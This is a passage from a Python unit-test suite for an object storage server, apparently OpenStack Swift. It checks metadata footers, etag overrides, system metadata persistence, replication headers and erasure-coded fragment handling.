req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Etag': 'other-etag',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
obj_etag = md5("obj data").hexdigest()
footer_meta = json.dumps({"Etag": obj_etag})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.etag, obj_etag)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
with open(objfile) as fh:
self.assertEqual(fh.read(), "obj data")
def _check_container_override_etag_preference(self, override_headers,
override_footers):
def mock_container_update(ctlr, op, account, container, obj, req,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
calls_made = []
ts_put = next(self.ts)
headers = {
'X-Timestamp': ts_put.internal,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Etag': 'other-etag',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'}
headers.update(override_headers)
req = Request.blank(
'/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'PUT'})
obj_etag = md5("obj data").hexdigest()
footers = {'Etag': obj_etag}
footers.update(override_footers)
footer_meta = json.dumps(footers)
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.etag, obj_etag)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
self.assertEqual({
'X-Size': str(len('obj data')),
'X-Etag': 'update-etag',
'X-Content-Type': 'text/plain',
'X-Timestamp': ts_put.internal,
}, calls_made[0][0])
self.assertEqual(POLICIES[0], calls_made[0][1])
def test_override_etag_lone_header_footer(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}),
def test_override_etag_footer_trumps_header(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag'},
{'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'ignored-etag'},
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_trumps_backend(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_header_trumps_backend_footer(self):
headers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
footers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
self._check_container_override_etag_preference(headers, footers)
def test_override_etag_sysmeta_footer_trumps_backend_header(self):
headers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
footers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
self._check_container_override_etag_preference(headers, footers)
def test_PUT_etag_in_footer_mismatch(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("green").hexdigest()})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"blue",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_meta_in_footer(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Object-Meta-X': 'Z',
'X-Object-Sysmeta-X': 'Z',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({
'X-Object-Meta-X': 'Y',
'X-Object-Sysmeta-X': 'Y',
})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"stuff stuff stuff",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp},
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.headers.get('X-Object-Meta-X'), 'Y')
self.assertEqual(resp.headers.get('X-Object-Sysmeta-X'), 'Y')
def test_PUT_missing_footer_checksum(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
# no Content-MD5
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_footer_checksum(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
bad_footer_meta_cksum = md5(footer_meta + "bad").hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + bad_footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_bad_footer_json(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = "{{{[[{{[{[[{[{[[{{{[{{{{[[{{[{["
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary--",
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_extra_mime_docs_ignored(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
environ={'REQUEST_METHOD': 'PUT'})
footer_meta = json.dumps({'X-Object-Meta-Mint': 'pepper'})
footer_meta_cksum = md5(footer_meta).hexdigest()
req.body = "\r\n".join((
"--boundary",
"",
"obj data",
"--boundary",
"Content-MD5: " + footer_meta_cksum,
"",
footer_meta,
"--boundary",
"This-Document-Is-Useless: yes",
"",
"blah blah I take up space",
"--boundary--"
))
req.headers.pop("Content-Length", None)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# swob made this into a StringIO for us
wsgi_input = req.environ['wsgi.input']
self.assertEqual(wsgi_input.tell(), len(wsgi_input.getvalue()))
def test_PUT_user_metadata_no_xattr(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY THREE'
def mock_get_and_setxattr(*args, **kargs):
error_num = errno.ENOTSUP if hasattr(errno, 'ENOTSUP') else \
errno.EOPNOTSUPP
raise IOError(error_num, 'Operation not supported')
with mock.patch('xattr.getxattr', mock_get_and_setxattr):
with mock.patch('xattr.setxattr', mock_get_and_setxattr):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_PUT_client_timeout(self):
class FakeTimeout(BaseException):
def __enter__(self):
raise self
def __exit__(self, typ, value, tb):
pass
# This is just so the test fails when run on older object server code
# instead of exploding.
if not hasattr(object_server, 'ChunkReadTimeout'):
object_server.ChunkReadTimeout = None
with mock.patch.object(object_server, 'ChunkReadTimeout', FakeTimeout):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Length': '6'})
req.environ['wsgi.input'] = WsgiBytesIO(b'VERIFY')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 408)
def test_PUT_system_metadata(self):
# check that sysmeta is stored in diskfile
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
def test_PUT_succeeds_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_put2 = next(self.ts).internal
t_post = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put2,
'Content-Length': 0,
'Content-Type': 'plain/text'},
)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_put2 + '.data')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post + '.meta')
self.assertTrue(os.path.isfile(meta_file))
def test_POST_system_metadata(self):
# check that diskfile sysmeta is not changed by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Sysmeta-Two': 'Not Two'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two'})
# .meta file metadata should have only user meta items
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'X-Object-Meta-1': 'Not One'})
def test_POST_then_fetch_content_type(self):
# check that content_type is updated by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'Content-Type': 'text/html'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One'})
# .meta file metadata should have updated content-type
metafile_name = encode_timestamps(Timestamp(timestamp2),
Timestamp(timestamp2),
explicit=True)
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
metafile_name + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'Content-Type': 'text/html',
'Content-Type-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One'})
def check_response(resp):
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/html')
self.assertEqual(resp.headers['content-type'], 'text/html')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp2)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_POST_transient_sysmeta(self):
# check that diskfile transient system meta is changed by a POST
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# original .data file metadata should be unchanged
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
self.assertDictEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Length': '14',
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
# .meta file metadata should have only user meta items
metafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.meta')
self.assertTrue(os.path.isfile(metafile))
self.assertDictEqual(diskfile.read_metadata(metafile),
{'X-Timestamp': timestamp2,
'name': '/a/c/o',
'X-Object-Meta-1': 'Not One',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
def test_PUT_then_fetch_system_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def check_response(resp):
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/plain')
self.assertEqual(resp.headers['content-type'], 'text/plain')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
'Bar')
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_PUT_then_POST_then_fetch_system_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'X-Object-Meta-0': 'deleted by post',
'X-Object-Sysmeta-0': 'Zero',
'X-Object-Transient-Sysmeta-0': 'deleted by post',
'X-Object-Meta-1': 'One',
'X-Object-Sysmeta-1': 'One',
'X-Object-Sysmeta-Two': 'Two',
'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Sysmeta-Two': 'Not Two',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
def check_response(resp):
# user meta should be updated but not sysmeta
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/plain')
self.assertEqual(resp.headers['content-type'], 'text/plain')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp2)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
self.assertEqual(resp.headers['x-object-sysmeta-0'], 'Zero')
self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
'Not Bar')
self.assertNotIn('x-object-meta-0', resp.headers)
self.assertNotIn('x-object-transient-sysmeta-0', resp.headers)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_PUT_with_replication_headers(self):
# check that otherwise disallowed headers are accepted when specified
# by X-Backend-Replication-Headers
# first PUT object
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'Content-Length': '14',
'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False'})
req.body = 'VERIFY SYSMETA'
# restrict set of allowed headers on this server
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
# X-Static-Large-Object is disallowed.
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'Content-Length': '14',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1'})
# PUT object again with X-Backend-Replication-Headers
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'text/plain',
'Content-Length': '14',
'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False',
'X-Backend-Replication-Headers':
'X-Static-Large-Object'})
req.body = 'VERIFY SYSMETA'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.data')
# X-Static-Large-Object should be copied since it is now allowed by
# replication headers.
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp2,
'Content-Type': 'text/plain',
'Content-Length': '14',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False'})
def test_PUT_container_connection(self):
def mock_http_connect(response, with_exc=False):
class FakeConn(object):
def __init__(self, status, with_exc):
self.status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.with_exc = with_exc
def getresponse(self):
if self.with_exc:
raise Exception('test')
return self
def read(self, amt=None):
return ''
return lambda *args, **kwargs: FakeConn(response, with_exc)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect', mock_http_connect(201)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect', mock_http_connect(500)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect',
mock_http_connect(500, with_exc=True)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_EC_GET_PUT_data(self):
for policy in self.ec_policies:
raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
frag_archives = encode_frag_archive_bodies(policy, raw_data)
frag_index = random.randint(0, len(frag_archives) - 1)
# put EC frag archive
req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/verify',
'Content-Length': len(frag_archives[frag_index]),
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy),
})
req.body = frag_archives[frag_index]
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# get EC frag archive
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, frag_archives[frag_index])
def test_EC_GET_quarantine_invalid_frag_archive(self):
policy = random.choice(self.ec_policies)
raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
frag_archives = encode_frag_archive_bodies(policy, raw_data)
frag_index = random.randint(0, len(frag_archives) - 1)
content_length = len(frag_archives[frag_index])
# put EC frag archive
req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/verify',
'Content-Length': content_length,
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy),
})
corrupt = 'garbage' + frag_archives[frag_index]
req.body = corrupt[:content_length]
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# get EC frag archive
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
with self.assertRaises(DiskFileQuarantined) as ctx:
